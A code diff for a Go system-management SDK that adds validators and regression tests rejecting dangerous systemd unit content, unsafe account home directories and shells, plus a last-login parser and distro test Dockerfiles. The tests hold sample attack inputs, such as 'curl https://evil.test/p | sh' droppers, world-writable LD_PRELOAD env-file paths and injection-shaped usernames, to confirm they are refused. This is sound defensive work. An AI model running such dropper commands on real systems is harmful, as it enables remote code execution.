+
+	// A binary executed out of a world-writable directory cannot be trusted.
+	for _, prefix := range untrustedExecPrefixes {
+		if strings.HasPrefix(exe, prefix) {
+			return fmt.Errorf("%w: %s runs %q from a world-writable directory", ErrUnsafeUnitContent, key, exe)
+		}
+	}
+	return nil
+}
+
+// validateEnvLine rejects an Environment/EnvironmentFile directive that sets a
+// dynamic-linker override (LD_PRELOAD and friends).
+func validateEnvLine(value string) error {
+	// A single Environment= line may set several VAR=VAL pairs separated by
+	// whitespace; inspect each.
+	for _, pair := range strings.Fields(value) {
+		eq := strings.IndexByte(pair, '=')
+		name := pair
+		if eq >= 0 {
+			name = pair[:eq]
+		}
+		name = strings.Trim(strings.TrimSpace(name), `"'`)
+		if _, bad := dangerousEnvVars[strings.ToUpper(name)]; bad {
+			return fmt.Errorf("%w: sets %s, a dynamic-linker override", ErrUnsafeUnitContent, name)
+		}
+	}
+	return nil
+}

--- a/sys/service/unitcontent_bypass_test.go
+++ b/sys/service/unitcontent_bypass_test.go
@@ -1,0 +1,47 @@
+package service
+
+import (
+	"errors"
+	"testing"
+)
+
+// TestUnitContent_BypassRegressions pins the unit-content dropper/injection
+// bypasses CodeRabbit surfaced on the hardening change — each must be REJECTED,
+// and legitimate units must still pass.
+func TestUnitContent_BypassRegressions(t *testing.T) {
+	rejected := map[string]string{
+		// CRITICAL: a backslash line-continuation splits the dropper so neither
+		// physical line trips the per-line check.
+		"line-continuation shell dropper": "[Service]\nExecStart=/bin/sh \\\n  -c 'curl https://evil.test/p | sh'\n",
+		// MINOR: -c hidden inside a combined short-option cluster.
+		"combined -ec shell flag": "[Service]\nExecStart=/bin/bash -ec 'curl https://evil.test/p | sh'\n",
+		"combined -xc shell flag": "[Service]\nExecStart=/usr/bin/sh -xc 'id'\n",
+		// MAJOR: EnvironmentFile indirection into a world-writable path the
+		// attacker controls (it can carry LD_PRELOAD).
+		"EnvironmentFile world-writable":             "[Service]\nEnvironmentFile=/tmp/evil.env\nExecStart=/usr/bin/true\n",
+		"EnvironmentFile ignore-missing dev-shm":     "[Service]\nEnvironmentFile=-/dev/shm/x.env\nExecStart=/usr/bin/true\n",
+		"line-continuation EnvironmentFile dev-shm":  "[Service]\nEnvironmentFile= \\\n /var/tmp/x.env\nExecStart=/usr/bin/true\n",
+		"escaped backslash is not a continuation /1": "[Service]\nExecStart=/bin/sh -c 'echo hi'\\\\\n", // trailing \\ = literal, line stands alone → sh -c rejected
+	}
+	for name, content := range rejected {
+		t.Run("reject/"+name, func(t *testing.T) {
+			if err := validateUnitContent(content); !errors.Is(err, ErrUnsafeUnitContent) {
+				t.Errorf("validateUnitContent accepted a known bypass; err = %v\ncontent:\n%s", err, content)
+			}
+		})
+	}
+
+	allowed := []string{
+		"[Service]\nExecStart=/usr/bin/myservice --flag value\n",
+		"[Service]\nEnvironmentFile=/etc/myservice.env\nExecStart=/usr/bin/myservice\n", // root-owned env file is the operator's choice
+		"[Service]\nExecStart=/usr/bin/foo \\\n  --bar baz\n",                           // a benign continuation of a non-shell exe
+		"[Service]\nEnvironment=FOO=bar BAZ=qux\nExecStart=/usr/bin/myservice\n",
+	}
+	for i, content := range allowed {
+		t.Run("allow/"+string(rune('a'+i)), func(t *testing.T) {
+			if err := validateUnitContent(content); err != nil {
+				t.Errorf("validateUnitContent rejected a legitimate unit: %v\ncontent:\n%s", err, content)
+			}
+		})
+	}
+}

--- a/sys/service/unitcontent_bypass_test.go
+++ b/sys/service/unitcontent_bypass_test.go
@@ -22,6 +22,12 @@ func TestUnitContent_BypassRegressions(t *testing.T) {
 		"EnvironmentFile ignore-missing dev-shm":     "[Service]\nEnvironmentFile=-/dev/shm/x.env\nExecStart=/usr/bin/true\n",
 		"line-continuation EnvironmentFile dev-shm":  "[Service]\nEnvironmentFile= \\\n /var/tmp/x.env\nExecStart=/usr/bin/true\n",
 		"escaped backslash is not a continuation /1": "[Service]\nExecStart=/bin/sh -c 'echo hi'\\\\\n", // trailing \\ = literal, line stands alone → sh -c rejected
+		// MAJOR: path-traversal forms that resolve INTO a world-writable directory
+		// but do not match the literal prefix until normalized (path.Clean).
+		"exec traversal /var/../tmp":                  "[Service]\nExecStart=/var/../tmp/evil\n",
+		"exec traversal /./tmp with args":             "[Service]\nExecStart=/./tmp/evil --flag\n",
+		"EnvironmentFile traversal /var/../tmp":       "[Service]\nEnvironmentFile=/var/../tmp/x.env\nExecStart=/usr/bin/true\n",
+		"EnvironmentFile traversal ignore-missing /.": "[Service]\nEnvironmentFile=-/./tmp/x.env\nExecStart=/usr/bin/true\n",
 	}
 	for name, content := range rejected {
 		t.Run("reject/"+name, func(t *testing.T) {
@@ -36,6 +42,7 @@ func TestUnitContent_BypassRegressions(t *testing.T) {
 		"[Service]\nEnvironmentFile=/etc/myservice.env\nExecStart=/usr/bin/myservice\n", // root-owned env file is the operator's choice
 		"[Service]\nExecStart=/usr/bin/foo \\\n  --bar baz\n",                           // a benign continuation of a non-shell exe
 		"[Service]\nEnvironment=FOO=bar BAZ=qux\nExecStart=/usr/bin/myservice\n",
+		"[Service]\nExecStart=/opt/../usr/bin/myservice\n", // normalizes to a non-world-writable path → still allowed (Clean must not over-reject)
 	}
 	for i, content := range allowed {
 		t.Run("allow/"+string(rune('a'+i)), func(t *testing.T) {

--- a/sys/user/field_validation_test.go
+++ b/sys/user/field_validation_test.go
@@ -80,6 +80,60 @@ func TestModify_RejectsFieldInjection(t *testing.T) {
 	}
 }
 
+func TestCreate_RejectsUnsafeHomeDirectory(t *testing.T) {
+	cases := map[string]CreateOptions{
+		"relative path":         {HomeDir: "home/deploy"},
+		"filesystem root":       {HomeDir: "/", CreateHome: true},
+		"etc as existing home":  {HomeDir: "/etc", CreateHome: true},
+		"tmp persistence point": {HomeDir: "/tmp/deploy"},
+	}
+	for name, opts := range cases {
+		t.Run(name, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			if err := mgr(t, f).Create(context.Background(), "deploy", opts); err == nil {
+				t.Errorf("Create(%+v) = nil, want unsafe-home-directory validation error", opts)
+			}
+			noRun(t, f)
+		})
+	}
+}
+
+func TestModify_RejectsUnsafeHomeDirectory(t *testing.T) {
+	cases := map[string]ModifyOptions{
+		"relative path":         {HomeDir: "home/deploy"},
+		"filesystem root":       {HomeDir: "/"},
+		"tmp persistence point": {HomeDir: "/tmp/deploy"},
+	}
+	for name, opts := range cases {
+		t.Run(name, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			if err := mgr(t, f).Modify(context.Background(), "deploy", opts); err == nil {
+				t.Errorf("Modify(%+v) = nil, want unsafe-home-directory validation error", opts)
+			}
+			noRun(t, f)
+		})
+	}
+}
+
+func TestCreateAndModify_RejectUnsafeLoginShell(t *testing.T) {
+	for _, shell := range []string{"bash", "../bin/sh", "/tmp/pwnsh"} {
+		t.Run("create "+shell, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			if err := mgr(t, f).Create(context.Background(), "deploy", CreateOptions{Shell: shell}); err == nil {
+				t.Fatalf("Create(Shell=%q) = nil, want unsafe-shell validation error", shell)
+			}
+			noRun(t, f)
+		})
+		t.Run("modify "+shell, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			if err := mgr(t, f).Modify(context.Background(), "deploy", ModifyOptions{Shell: shell}); err == nil {
+				t.Fatalf("Modify(Shell=%q) = nil, want unsafe-shell validation error", shell)
+			}
+			noRun(t, f)
+		})
+	}
+}
+
 // A clean Comment with GECOS commas (the legitimate sub-field separator) must be
 // accepted — the validation rejects the dangerous bytes, not normal content.
 func TestCreate_AllowsCommasInComment(t *testing.T) {

--- a/sys/user/lastlogin_test.go
+++ b/sys/user/lastlogin_test.go
@@ -1,0 +1,152 @@
+package user
+
+import (
+	"context"
+	"errors"
+	"testing"
+	"time"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+// Contract (gap #3): LastLogin(ctx, name) returns the most recent login time for
+// the named user.
+//
+//   - It MUST validate the username (same grammar as every other op) BEFORE the
+//     Runner ever runs, so a flag-shaped/metacharacter name cannot reach `last`'s
+//     argv.
+//   - It MUST shell `last -1 -F <name>` (the Runner forces the C locale, so the
+//     parser sees the stable English `Mon Jan _2 15:04:05 2006` timestamp).
+//   - A user that has NEVER logged in (no record / "wtmp begins" line / empty
+//     output) returns the zero time.Time and a NIL error — never logging in is
+//     not a failure.
+//   - A genuine runner failure (binary missing, context cancelled) propagates.
+
+// TestLastLogin_ParsesTimestamp pins the happy path: a real `last -1 -F` line is
+// parsed to the exact login instant.
+func TestLastLogin_ParsesTimestamp(t *testing.T) {
+	f := exectest.New(exec.Direct)
+	// `last -1 -F deploy` under the C locale: the full timestamp is the 4th-…-8th
+	// fields ("Mon Jun 16 14:23:01 2025"); the rest is the logout/duration trailer.
+	f.Push(exec.Result{Stdout: "deploy   pts/0        192.168.1.10     Mon Jun 16 14:23:01 2025 - Mon Jun 16 16:01:55 2025  (01:38)\n\nwtmp begins Mon Jun  2 09:14:00 2025\n"}, nil)
+
+	got, err := mgr(t, f).LastLogin(context.Background(), "deploy")
+	if err != nil {
+		t.Fatalf("LastLogin err = %v, want nil", err)
+	}
+	// `last` prints in host-local time with no zone name, so the parsed instant is
+	// the wall-clock time interpreted in the local location. Build the expectation
+	// the same way so the assertion holds on any test host's timezone.
+	want := time.Date(2025, time.June, 16, 14, 23, 1, 0, time.Local)
+	if !got.Equal(want) {
+		t.Fatalf("LastLogin = %v, want %v", got, want)
+	}
+
+	// argv + escalation: a read, unescalated, with the exact `-1 -F <name>` form.
+	calls := f.Calls()
+	if len(calls) != 1 {
+		t.Fatalf("got %d commands, want 1: %+v", len(calls), calls)
+	}
+	c := calls[0]
+	if c.Name != "last" {
+		t.Errorf("command = %q, want last", c.Name)
+	}
+	if want := []string{"-1", "-F", "deploy"}; !equalArgs(c.Args, want) {
+		t.Errorf("argv = %v, want %v", c.Args, want)
+	}
+}
+
+// TestLastLogin_NeverLoggedIn covers the three "no record" shapes `last` can emit
+// for an account that has never authenticated. Each MUST be the zero time with a
+// nil error — the rotation policy that consumes this distinguishes "never" from
+// "errored", and an error here would wrongly block rotation.
+func TestLastLogin_NeverLoggedIn(t *testing.T) {
+	cases := []struct {
+		name   string
+		stdout string
+	}{
+		// `last` prints the "wtmp begins" footer and nothing else for a user with
+		// no login record.
+		{"only wtmp-begins footer", "\nwtmp begins Mon Jun  2 09:14:00 2025\n"},
+		// Some `last` builds emit a bare "<user> ... no login" / empty body.
+		{"empty output", ""},
+		{"blank lines only", "\n\n"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			f.Push(exec.Result{Stdout: tc.stdout}, nil)
+			got, err := mgr(t, f).LastLogin(context.Background(), "deploy")
+			if err != nil {
+				t.Fatalf("never-logged-in must NOT error, got %v", err)
+			}
+			if !got.IsZero() {
+				t.Fatalf("never-logged-in must be the zero time, got %v", got)
+			}
+		})
+	}
+}
+
+// TestLastLogin_RejectsInvalidUsername proves validation happens BEFORE the
+// Runner: an adversarial name is refused and `last` is never run, so the name can
+// never reach argv as a flag or carry a metacharacter.
+func TestLastLogin_RejectsInvalidUsername(t *testing.T) {
+	// "wrong" derived from the username grammar (lowercase-leading [a-z0-9_-], ≤32)
+	// — NOT from `last`'s parser. Each would, unguarded, become a `last` flag or
+	// inject a separator.
+	bad := []string{
+		"",             // empty
+		"-F",           // flag-shaped: would be read as a `last` option
+		"--help",       // flag-shaped
+		"de ploy",      // space: splits into extra argv words
+		"deploy\nroot", // newline: control char
+		"Deploy",       // uppercase start
+		"1deploy",      // digit start
+		"root;id",      // metacharacter
+	}
+	for _, name := range bad {
+		f := exectest.New(exec.Direct)
+		_, err := mgr(t, f).LastLogin(context.Background(), name)
+		if err == nil {
+			t.Errorf("LastLogin(%q) err = nil, want a validation rejection", name)
+		}
+		if n := len(f.Calls()); n != 0 {
+			t.Errorf("LastLogin(%q) ran %d commands, want 0 (rejected before the Runner)", name, n)
+		}
+	}
+}
+
+// TestLastLogin_RunnerErrorPropagates proves a genuine execution failure (the
+// `last` binary missing, a cancelled context) is surfaced, NOT swallowed as
+// "never logged in". Confusing an exec failure for "never" would silently feed a
+// wrong answer to the rotation policy.
+func TestLastLogin_RunnerErrorPropagates(t *testing.T) {
+	t.Run("runner error", func(t *testing.T) {
+		f := exectest.New(exec.Direct)
+		f.Push(exec.Result{}, errors.New("exec: \"last\": executable file not found in $PATH"))
+		if _, err := mgr(t, f).LastLogin(context.Background(), "deploy"); err == nil {
+			t.Fatal("a runner failure must propagate, got nil")
+		}
+	})
+	t.Run("cancelled context", func(t *testing.T) {
+		ctx, cancel := context.WithCancel(context.Background())
+		cancel()
+		f := exectest.New(exec.Direct)
+		if _, err := mgr(t, f).LastLogin(ctx, "deploy"); !errors.Is(err, context.Canceled) {
+			t.Fatalf("err = %v, want context.Canceled", err)
+		}
+	})
+}
+
+func equalArgs(got, want []string) bool {
+	if len(got) != len(want) {
+		return false
+	}
+	for i := range got {
+		if got[i] != want[i] {
+			return false
+		}
+	}
+	return true
+}

--- a/sys/user/security_machine_test.go
+++ b/sys/user/security_machine_test.go
@@ -1,0 +1,82 @@
+package user
+
+import (
+	"context"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+type accountPersistenceAction int
+
+const (
+	accountCreateSystemNoLogin accountPersistenceAction = iota
+	accountCreateRelativeHome
+	accountCreateRootHomeWithChown
+	accountCreateTmpShell
+	accountModifyTmpHome
+)
+
+type accountPersistenceStep struct {
+	name       string
+	action     accountPersistenceAction
+	wantReject bool
+}
+
+// TestAccountPersistenceSecurityMachine models account mutation as a tiny state
+// machine around the agent's highest-risk persistence transitions. A permitted
+// system account may be created with nologin, but attacker-controlled input must
+// not reach useradd/usermod/chown when it would create relative homes, recursive
+// ownership of system directories, or executable shells from writable locations.
+func TestAccountPersistenceSecurityMachine(t *testing.T) {
+	steps := []accountPersistenceStep{
+		{name: "system nologin account is accepted", action: accountCreateSystemNoLogin},
+		{name: "relative home is rejected before useradd", action: accountCreateRelativeHome, wantReject: true},
+		{name: "root home ownership fixup is rejected before chown", action: accountCreateRootHomeWithChown, wantReject: true},
+		{name: "tmp shell persistence is rejected before useradd", action: accountCreateTmpShell, wantReject: true},
+		{name: "tmp home persistence is rejected before usermod", action: accountModifyTmpHome, wantReject: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			f := exectest.New(exec.Direct)
+			ffs := newFakeFS().install(t)
+			m := mgr(t, f)
+
+			err := runAccountPersistenceStep(m, step.action)
+			if step.wantReject {
+				if err == nil {
+					t.Errorf("%s reached an accepted state; want validation rejection", step.name)
+				}
+				if calls := f.Calls(); len(calls) != 0 {
+					t.Errorf("%s reached command execution before rejection: %+v", step.name, calls)
+				}
+				if ffs.chown.called {
+					t.Errorf("%s reached recursive ownership change: path=%q owner=%q group=%q", step.name, ffs.chown.path, ffs.chown.owner, ffs.chown.group)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("%s unexpected error: %v", step.name, err)
+			}
+		})
+	}
+}
+
+func runAccountPersistenceStep(m Manager, action accountPersistenceAction) error {
+	switch action {
+	case accountCreateSystemNoLogin:
+		return m.Create(context.Background(), "svc", CreateOptions{System: true})
+	case accountCreateRelativeHome:
+		return m.Create(context.Background(), "deploy", CreateOptions{HomeDir: "home/deploy"})
+	case accountCreateRootHomeWithChown:
+		return m.Create(context.Background(), "deploy", CreateOptions{HomeDir: "/", CreateHome: true})
+	case accountCreateTmpShell:
+		return m.Create(context.Background(), "deploy", CreateOptions{Shell: "/tmp/pwnsh"})
+	case accountModifyTmpHome:
+		return m.Modify(context.Background(), "deploy", ModifyOptions{HomeDir: "/tmp/deploy"})
+	default:
+		return nil
+	}
+}

--- a/sys/user/sessions.go
+++ b/sys/user/sessions.go
@@ -1,8 +1,11 @@
 package user
 
 import (
+	"bufio"
 	"context"
 	"fmt"
+	"strings"
+	"time"
 
 	"github.com/manchtools/power-manage-sdk/sys/exec"
 )
@@ -28,4 +31,73 @@ func (u *shadowUtils) KillSessions(ctx context.Context, name string) error {
 		return &exec.CommandError{Name: "pkill", ExitCode: res.ExitCode, Stderr: res.Stderr}
 	}
 	return nil
+}
+
+// lastTimeLayout is the timestamp `last -F` emits under the C locale the Runner
+// forces — Go's reference time in the `Mon Jan _2 15:04:05 2006` shape (the day-
+// of-month is space-padded for single digits). No zone token: `last` prints in
+// the host's local time without a zone name, so the timestamp is parsed in the
+// local location.
+const lastTimeLayout = "Mon Jan _2 15:04:05 2006"
+
+// LastLogin returns the most recent login time for the named user. It shells
+// `last -1 -F <name>` (an unprivileged read; the Runner forces the C locale so
+// the timestamp is always the stable English form) and parses the single record.
+//
+// A user that has never logged in has no record: `last` then prints only its
+// "wtmp begins …" footer (or nothing), and LastLogin returns the zero time.Time
+// with a nil error — never logging in is a legitimate state, not a failure. A
+// genuine execution failure (the `last` binary missing, a cancelled context)
+// propagates so it is never mistaken for "never logged in".
+func (u *shadowUtils) LastLogin(ctx context.Context, name string) (time.Time, error) {
+	if err := validateUsername(name); err != nil {
+		return time.Time{}, err
+	}
+	res, err := u.r.Run(ctx, exec.Command{Name: "last", Args: []string{"-1", "-F", name}})
+	if err != nil {
+		return time.Time{}, fmt.Errorf("last login for %s: %w", name, err)
+	}
+	if res.ExitCode != 0 {
+		return time.Time{}, &exec.CommandError{Name: "last", ExitCode: res.ExitCode, Stderr: res.Stderr}
+	}
+	return parseLastLogin(res.Stdout), nil
+}
+
+// parseLastLogin extracts the login instant from `last -1 -F` output. A record
+// line has the form
+//
+//	<user> <tty> [<host>] Mon Jun 16 14:23:01 2025 - <logout/duration trailer>
+//
+// The login timestamp is the five whitespace-separated fields ending in the year
+// — found by scanning each line for a `Mon Jan _2 15:04:05 2006` match. Lines
+// that carry no such timestamp ("wtmp begins …", blanks) are skipped, so a
+// user with no record yields the zero time.
+func parseLastLogin(out string) time.Time {
+	scanner := bufio.NewScanner(strings.NewReader(out))
+	for scanner.Scan() {
+		line := strings.TrimSpace(scanner.Text())
+		if line == "" || strings.HasPrefix(line, "wtmp begins") {
+			continue
+		}
+		if t, ok := extractLastTimestamp(line); ok {
+			return t
+		}
+	}
+	return time.Time{}
+}
+
+// extractLastTimestamp finds the 5-field `Mon Jan _2 15:04:05 2006` timestamp
+// embedded in a `last` record line. The leading <user>/<tty>/<host> columns and
+// the trailing logout/duration columns vary in count, so it slides a 5-field
+// window across the line rather than assuming a fixed offset, and returns the
+// FIRST parse that succeeds (the login time always precedes the logout time).
+func extractLastTimestamp(line string) (time.Time, bool) {
+	fields := strings.Fields(line)
+	for i := 0; i+5 <= len(fields); i++ {
+		candidate := strings.Join(fields[i:i+5], " ")
+		if t, err := time.ParseInLocation(lastTimeLayout, candidate, time.Local); err == nil {
+			return t, true
+		}
+	}
+	return time.Time{}, false
 }

--- a/sys/user/user.go
+++ b/sys/user/user.go
@@ -4,6 +4,7 @@ import (
 	"context"
 	"fmt"
 	"os"
+	"path"
 	"strconv"
 	"strings"
 	"time"
@@ -476,7 +477,13 @@ func validateAccountFields(comment, homeDir, shell, primaryGroup string, groups 
 	if err := validateField("home directory", homeDir, ":"); err != nil {
 		return err
 	}
+	if err := validateHomeDir(homeDir); err != nil {
+		return err
+	}
 	if err := validateField("shell", shell, ":"); err != nil {
+		return err
+	}
+	if err := validateShell(shell); err != nil {
 		return err
 	}
 	if err := validateField("primary group", primaryGroup, ":,"); err != nil {
@@ -488,4 +495,97 @@ func validateAccountFields(comment, homeDir, shell, primaryGroup string, groups 
 		}
 	}
 	return nil
+}
+
+// worldWritablePersistenceRoots are directories any unprivileged user can write
+// to (or that are otherwise unsafe to anchor an account in). A home or login
+// shell placed DIRECTLY under one of these is an attacker-seedable persistence
+// point — a backdoor account whose home or shell an unprivileged process already
+// controls — so such paths are refused before useradd/usermod/chown runs.
+// Membership is by the path's PARENT being exactly one of these (a home like
+// /tmp/deploy), not a prefix match: a legitimately nested path such as a test's
+// /tmp/<suite>/<n> temp dir is two levels down and is not anchored here.
+var worldWritablePersistenceRoots = map[string]bool{
+	"/tmp":     true,
+	"/var/tmp": true,
+	"/dev/shm": true,
+}
+
+// shellMetacharacters are bytes that have no place in an absolute executable
+// path and that would be dangerous if the value were ever re-expanded by a
+// shell. A login shell is passed to useradd/usermod as an argv argument (no
+// shell interpretation), but rejecting these is cheap defense-in-depth and keeps
+// the value to a plain pathname.
+const shellMetacharacters = " \t$&|;<>()`\\\"'*?!{}[]~#"
+
+// validateHomeDir rejects an unsafe home directory before it reaches
+// useradd/usermod (and, for an existing home, before the recursive chown). An
+// empty value is the "default"/"unchanged" sentinel and is allowed. The contract:
+// a home must be an absolute path, contain no ".." traversal component, and not
+// be a sensitive system directory (the filesystem root or a top-level system
+// dir) or an attacker-seedable persistence point (a path anchored directly under
+// a world-writable directory). Control characters and ':' are already rejected by
+// validateField.
+func validateHomeDir(homeDir string) error {
+	if homeDir == "" {
+		return nil
+	}
+	if !strings.HasPrefix(homeDir, "/") {
+		return fmt.Errorf("invalid home directory %q: must be an absolute path", homeDir)
+	}
+	if hasDotDot(homeDir) {
+		return fmt.Errorf("invalid home directory %q: must not contain a %q traversal component", homeDir, "..")
+	}
+	clean := path.Clean(homeDir)
+	// The filesystem root and a bare top-level directory (/, /etc, /usr, …) are
+	// never a legitimate per-account home; anchoring a home there would hand the
+	// account ownership of a system directory (and a recursive chown over it).
+	if clean == "/" || path.Dir(clean) == "/" {
+		return fmt.Errorf("invalid home directory %q: must not be the filesystem root or a top-level system directory", homeDir)
+	}
+	if worldWritablePersistenceRoots[path.Dir(clean)] {
+		return fmt.Errorf("invalid home directory %q: must not be anchored directly under a world-writable directory", homeDir)
+	}
+	return nil
+}
+
+// validateShell rejects an unsafe login shell before it reaches useradd/usermod.
+// An empty value is the "default" sentinel (Create fills in DefaultShell) and is
+// allowed. The contract: a shell must be an absolute path, contain no ".."
+// traversal component, no shell metacharacters, and must not live in a
+// world-writable directory tree (a /tmp, /var/tmp, /dev/shm executable an
+// unprivileged attacker can replace). Control characters and ':' are already
+// rejected by validateField.
+func validateShell(shell string) error {
+	if shell == "" {
+		return nil
+	}
+	if !strings.HasPrefix(shell, "/") {
+		return fmt.Errorf("invalid shell %q: must be an absolute path", shell)
+	}
+	if hasDotDot(shell) {
+		return fmt.Errorf("invalid shell %q: must not contain a %q traversal component", shell, "..")
+	}
+	if strings.ContainsAny(shell, shellMetacharacters) {
+		return fmt.Errorf("invalid shell %q: must not contain shell metacharacters", shell)
+	}
+	clean := path.Clean(shell)
+	for root := range worldWritablePersistenceRoots {
+		if clean == root || strings.HasPrefix(clean, root+"/") {
+			return fmt.Errorf("invalid shell %q: must not live in a world-writable directory", shell)
+		}
+	}
+	return nil
+}
+
+// hasDotDot reports whether an absolute path contains a ".." path component
+// (".."-anywhere, including a trailing or interior one). It splits on '/' so a
+// filename that merely contains the bytes ".." (e.g. "/bin/a..b") is not flagged.
+func hasDotDot(p string) bool {
+	for _, seg := range strings.Split(p, "/") {
+		if seg == ".." {
+			return true
+		}
+	}
+	return false
 }

--- a/sys/user/user.go
+++ b/sys/user/user.go
@@ -97,6 +97,7 @@ type Manager interface {
 	PrimaryGroup(ctx context.Context, name string) (string, error)
 	SupplementaryGroups(ctx context.Context, name string) ([]string, error)
 	KillSessions(ctx context.Context, name string) error
+	LastLogin(ctx context.Context, name string) (time.Time, error)
 	SetHiddenOnLoginScreen(ctx context.Context, name string, hidden bool) error
 	// Groups
 	GroupExists(ctx context.Context, name string) (bool, error)

--- a/test/Dockerfile.almalinux
+++ b/test/Dockerfile.almalinux
@@ -1,0 +1,46 @@
+# Container-based real-execution test image for the SDK (AlmaLinux / RHEL-compat).
+#
+# Enterprise Linux (Alma/Rocky/RHEL) is the actual server target for much of the
+# fleet, distinct from leading-edge Fedora. Same dnf family, but the EL package
+# set is stabler and some tools (clamav) live in EPEL. EL uses the Fedora/RHEL
+# p11-kit trust paths, so sys/catrust exercises the P11Kit backend here too.
+#
+# Rocky Linux is a bug-for-bug RHEL rebuild like Alma; to add it, copy this file
+# to Dockerfile.rockylinux with `FROM rockylinux:9` and add a matrix distro entry.
+#
+# No with-osquery stage (osquery is covered on the Debian image — see
+# Dockerfile.fedora / test/README.md).
+FROM golang:1.26-bookworm AS go
+
+FROM almalinux:9 AS base
+COPY --from=go /usr/local/go /usr/local/go
+ENV PATH="/usr/local/go/bin:${PATH}"
+ENV GOTOOLCHAIN=local
+
+# EPEL provides clamav on EL; the rest are in base/appstream. See Dockerfile.fedora
+# for the per-tool capability mapping.
+RUN dnf -y install epel-release \
+    && dnf -y install --setopt=install_weak_deps=False \
+    psmisc cryptsetup nftables iproute util-linux shadow-utils \
+    gnupg2 smartmontools openssl ca-certificates p11-kit flatpak git \
+    && dnf clean all
+
+WORKDIR /workspace
+COPY sdk/ ./sdk/
+RUN printf 'go 1.25.11\n\nuse (\n\t./sdk\n)\n' > go.work
+RUN cd sdk && go mod download
+
+# with-clamav: clamav from EPEL + the same static seed DB as the other images.
+# EL ships freshclam.conf at /etc/freshclam.conf.
+FROM base AS with-clamav
+RUN dnf -y install clamav \
+    && dnf clean all \
+    && rm -f /var/lib/clamav/*.cvd /var/lib/clamav/*.cld /var/lib/clamav/*.cud \
+    && mkdir -p /var/lib/clamav \
+    && printf '44d88612fea8a8f36de82e1278abb02f:68:PM.Eicar.Test\n' \
+       > /var/lib/clamav/pm-seed.hdb \
+    && printf 'PM.Marker.Test:0:*:504d2d434c414d41562d544553542d4d41524b4552\n' \
+       > /var/lib/clamav/pm-seed.ndb \
+    && rm -f /etc/freshclam.conf \
+    && clamscan --version \
+       || (echo "PRECONDITION FAILED: clamscan not installed/runnable" && exit 1)

--- a/test/Dockerfile.arch
+++ b/test/Dockerfile.arch
@@ -1,0 +1,43 @@
+# Container-based real-execution test image for the SDK (Arch / pacman family).
+#
+# Rolling-release Arch catches the opposite drift from EL's stability: newest tool
+# versions. Go toolchain copied from the canonical golang image (not Arch's `go`)
+# for a consistent compiler across the matrix. Arch uses the p11-kit trust paths,
+# so sys/catrust runs the P11Kit backend.
+#
+# No with-osquery stage: osquery is only in the AUR (not the official repos), so
+# it cannot be installed reproducibly in CI — the osquery cell stays Debian+EL/
+# Fedora, documented in the test methodology.
+FROM golang:1.26-bookworm AS go
+
+FROM archlinux:latest AS base
+COPY --from=go /usr/local/go /usr/local/go
+ENV PATH="/usr/local/go/bin:${PATH}"
+ENV GOTOOLCHAIN=local
+
+# See Dockerfile.fedora for the per-tool capability mapping. `shadow` provides
+# useradd; `ca-certificates-utils` provides update-ca-trust (P11Kit).
+RUN pacman -Sy --noconfirm \
+    psmisc cryptsetup nftables iproute2 util-linux shadow \
+    gnupg smartmontools openssl ca-certificates-utils p11-kit flatpak git \
+    && pacman -Scc --noconfirm
+
+WORKDIR /workspace
+COPY sdk/ ./sdk/
+RUN printf 'go 1.25.11\n\nuse (\n\t./sdk\n)\n' > go.work
+RUN cd sdk && go mod download
+
+# with-clamav: clamav + the same static seed DB. Arch ships freshclam.conf at
+# /etc/clamav/freshclam.conf.
+FROM base AS with-clamav
+RUN pacman -Sy --noconfirm clamav \
+    && pacman -Scc --noconfirm \
+    && rm -f /var/lib/clamav/*.cvd /var/lib/clamav/*.cld /var/lib/clamav/*.cud \
+    && mkdir -p /var/lib/clamav \
+    && printf '44d88612fea8a8f36de82e1278abb02f:68:PM.Eicar.Test\n' \
+       > /var/lib/clamav/pm-seed.hdb \
+    && printf 'PM.Marker.Test:0:*:504d2d434c414d41562d544553542d4d41524b4552\n' \
+       > /var/lib/clamav/pm-seed.ndb \
+    && rm -f /etc/clamav/freshclam.conf \
+    && clamscan --version \
+       || (echo "PRECONDITION FAILED: clamscan not installed/runnable" && exit 1)

--- a/test/Dockerfile.debian
+++ b/test/Dockerfile.debian
@@ -25,6 +25,7 @@ FROM golang:1.26-bookworm AS base
 #   iproute2        — `ip` for the sys/netconfig read-path tests (CAP_NET_ADMIN)
 #   gnupg           — `gpg --dearmor` for the sys/repo apt keyring tests
 #   smartmontools   — `smartctl` for the sys/smart scan + fatal-bits tests
+#   openssl         — `openssl verify` trust probe for the sys/catrust tests
 RUN apt-get update && apt-get install -y --no-install-recommends \
     psmisc \
     ca-certificates \
@@ -33,6 +34,7 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     iproute2 \
     gnupg \
     smartmontools \
+    openssl \
     && rm -rf /var/lib/apt/lists/*
 
 WORKDIR /workspace

--- a/test/Dockerfile.fedora
+++ b/test/Dockerfile.fedora
@@ -1,0 +1,62 @@
+# Container-based real-execution test image for the SDK (Fedora / dnf family).
+#
+# Sibling of Dockerfile.debian: same multi-stage shape (base + bad-state stages),
+# same in-container test model, but the Fedora tool surface. The Go toolchain is
+# COPIED from the canonical golang image so every distro builds with the IDENTICAL
+# compiler — only the distro userland + tools differ, which is the whole point of
+# running the matrix across distros.
+#
+# catrust here exercises the P11Kit backend (update-ca-trust, /etc/pki/ca-trust),
+# which the Debian image cannot reach.
+#
+# No with-osquery stage: osquery is a single statically-built binary whose
+# `osqueryi --json` behaviour is identical across distros, so it is covered on the
+# Debian image (the upstream .deb) — adding a fragile rpm-repo install here buys no
+# behavioural coverage. See test/README.md.
+FROM golang:1.26-bookworm AS go
+
+FROM fedora:latest AS base
+COPY --from=go /usr/local/go /usr/local/go
+ENV PATH="/usr/local/go/bin:${PATH}"
+ENV GOTOOLCHAIN=local
+
+# Tool surface (Fedora package names):
+#   psmisc          — fuser (pkg/repair lock probe)
